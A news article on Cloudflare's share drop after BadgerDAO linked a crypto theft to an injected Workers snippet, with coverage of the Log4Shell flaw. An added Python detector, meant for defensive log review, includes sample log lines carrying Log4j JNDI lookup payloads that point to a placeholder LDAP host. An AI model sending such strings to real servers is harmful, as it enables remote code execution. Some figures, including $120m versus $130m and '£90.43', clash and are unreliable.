
Cloudflare (NET) stock price tumbles 6% on cyberthreat

By Monte Stewart


Cloudflare stock price takes a hit after a flaw is linked to a $130m crypto theft - Photo: Shutterstock

Cloudflare’s stock price closed down 6.47% Friday after decentralised-finance firm BadgerDAO said a flaw in the company’s account-creation process led to the theft of $120m (£90.43) in cryptocurrencies.

Companies around the world scrambled Friday to fix an open-source software bug dubbed Log4Shell. Despite the security troubles, the BadgerDAO token rose more than 14% at one point Friday afternoon on the West Coast.

Cloudflare (NET) secures and ensures the reliability of external-facing online resources such as websites, application programming interfaces (APIs), and other software applications.

BadgerDAO cites phishing attack

In a blog post, BadgerDAO attributed the theft to a 2 December phishing attack that stemmed from a “maliciously injected snippet” provided by Cloudflare Workers, a serverless application platform that runs on the company’s cloud-based network.

Cybersecurity experts attributed the cyberthreat to a software application known as Log4J. BadgerDAO noted that it was working with Cloudflare and Mandiant to prevent future problems.

BadgerDAO indicated that the theft of its assets was tied to a log glitch – but did not specifically cite Log4J. Cloudflare has denied that its systems were compromised, Bloomberg reported.

Threat ‘extremely bad’

“This log4j (CVE-2021-44228) vulnerability is extremely bad,” tweeted Marcus Hutchins, a British cybersecurity expert credited with helping to stop the 2017 WannaCry ransomware attack that struck hundreds of thousands of computers around the world. “Millions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string. So far iCloud, Steam, and Minecraft (software platforms) have all been confirmed vulnerable.”

In Java script, logging is an API that provides the ability to trace out the errors of the applications, according to When an application generates a logging call, the logger records the event in a log record. After that, the record is sent to the corresponding handlers or appenders.

Cloudflare updates WAF

Sam Rhea, Cloudflare’s product management director, said in a blog post that the company has updated its web application firewall (WAF) to defend computer infrastructure against what was dubbed a zero-day attack because developers were unfamiliar with it.

Rhea said the logging package allows hackers to execute code on a remote service and also exploits servers that are allowed unfettered connectivity to the Internet.

“If the string has already been logged, the vulnerability compromises servers by tricking them into sending a request to a malicious LDAP server,” wrote Rhea. “The destination of the malicious server could be any arbitrary (website address). Attackers who control that (address) can then respond to the request with arbitrary code that the server can execute.”
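As an added example (not code from Cloudflare or from the original article), the Python below scans log lines for the kind of logged string Rhea describes, a Log4j `${jndi:...}` lookup, and extracts the destination the server would be told to contact so it can be checked against egress records. The log lines, host names and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# A Log4j JNDI lookup; captures the protocol (ldap, rmi, ...) and destination host.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:/+([^/\s:}]+)", re.IGNORECASE)
# One lookup nested inside another can hide the keyword from a literal match,
# so it is flagged for manual review rather than silently passed.
NESTED_LOOKUP = re.compile(r"\$\{[^}]*\$\{")

def fully_decode(text, max_rounds=3):
    """Undo repeated percent-encoding so '%24%7B' and '%2524%257B' both become '${'."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def scan_line(line):
    """Return a finding for one log line, or None when nothing matches."""
    decoded = fully_decode(line)
    match = JNDI_LOOKUP.search(decoded)
    if match:
        return {"kind": "jndi-lookup",
                "protocol": match.group(1).lower(),
                "destination": match.group(2).lower()}
    if NESTED_LOOKUP.search(decoded):
        return {"kind": "nested-lookup", "protocol": None, "destination": None}
    return None

def scan_log(lines):
    """Scan an iterable of log lines; findings carry 1-based line numbers."""
    findings = []
    for number, line in enumerate(lines, 1):
        finding = scan_line(line)
        if finding:
            findings.append({"line": number, **finding})
    return findings

# Constructed access-log lines (documentation addresses, placeholder host name).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:09:14:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:09:14:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://ldap.example.test/a}"',
    '203.0.113.9 - - [10/Dec/2021:09:14:09 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fldap.example.test%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.9 - - [10/Dec/2021:09:14:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${outer:${inner}}"',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A hit only shows that the string reached a log; whether the server made the outbound request has to be confirmed from DNS or firewall egress records for the extracted destination.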

Cloudflare co-founder, president and CEO Matthew Prince said on Twitter that Log4J was so bad that the company decided to roll out at least some form of protection for all customers by default, even those who do not have the company’s WAF.

Companies need to patch

“But, no matter what we are able to do, we will not be able to fully protect against all exploits of #Log4J because there are so many ways things can get logged. (It’s) critical to patch your Log4J systems,” he wrote.

“I'd be hard-pressed to think of a company that's not at risk,” Joe Sullivan, chief security officer for Cloudflare, told ABC News.

BadgerDAO has indicated that $9m in the stolen assets are recoverable.
